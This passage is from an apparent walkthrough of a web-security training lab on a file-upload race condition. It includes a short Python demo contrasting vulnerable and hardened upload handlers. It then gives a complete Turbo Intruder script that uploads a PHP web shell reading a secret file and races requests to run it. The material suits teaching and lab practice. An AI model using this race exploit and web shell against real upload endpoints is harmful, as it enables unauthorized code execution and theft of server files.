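    vulnerable_save(webroot, "readSecret.php", php, spy)
    hardened_save(webroot, staging, php, spy)       # rejected, spy never called
    final = hardened_save(webroot, staging, png, spy)
    return {"vuln_window": seen[0], "hardened_window": seen[1],
            "published": os.path.basename(final),
            "webroot": sorted(os.listdir(webroot))}
```

In `demo()` the vulnerable handler exposes the PHP file for one observation before deleting it, while the hardened handler never puts unvalidated content under the web root and publishes the valid image under a random name.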

image 170

The idea is for the code to end up looking something like the following:

# Find more example scripts at https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/default.py
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''
POST /my-account/avatar HTTP/1.1
Host: ac4b1f5f1e3dd03bc0f834b600e0000b.web-security-academy.net
Cookie: session=JNvosgi2FoKxUcKBOL4y07fao7UWjLLG
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------330791307811450659691420606466
Content-Length: 549
Origin: https://ac4b1f5f1e3dd03bc0f834b600e0000b.web-security-academy.net
Dnt: 1
Referer: https://ac4b1f5f1e3dd03bc0f834b600e0000b.web-security-academy.net/my-account
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------330791307811450659691420606466
Content-Disposition: form-data; name="avatar"; filename="readSecret.php"
Content-Type: application/x-php

<?php echo file_get_contents('/home/carlos/secret'); ?>

-----------------------------330791307811450659691420606466
Content-Disposition: form-data; name="user"

wiener
-----------------------------330791307811450659691420606466
Content-Disposition: form-data; name="csrf"

eNET4DMt9dleHLPIsCZpUeBUCbDs5JQ2
-----------------------------330791307811450659691420606466--

'''

    request2 = '''
GET /files/avatars/readSecret.php HTTP/1.1
Host: ac4b1f5f1e3dd03bc0f834b600e0000b.web-security-academy.net
Cookie: session=JNvosgi2FoKxUcKBOL4y07fao7UWjLLG
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

With that done, we start the attack by clicking the "Attack" button at the bottom:

image 171
image 172

A new window will open where we can see the different requests. If we look at the 5 GET requests, 3 returned a 404 error, but 2 returned 200, so those two requests were made inside the tiny window we talked about earlier. Likewise, if we click on one of them, we can see the output of the interpreted PHP code, in other words, the contents of the secret file.

With this, we submit the solution:

image 173
image 174

And in this way we complete the lab:

image 175
image 176

Links of interest:

  • Race Condition – Hacktricks
  • HackerOne Report
  • HackerOne Report
  • Race Conditions Exploring the Possibilities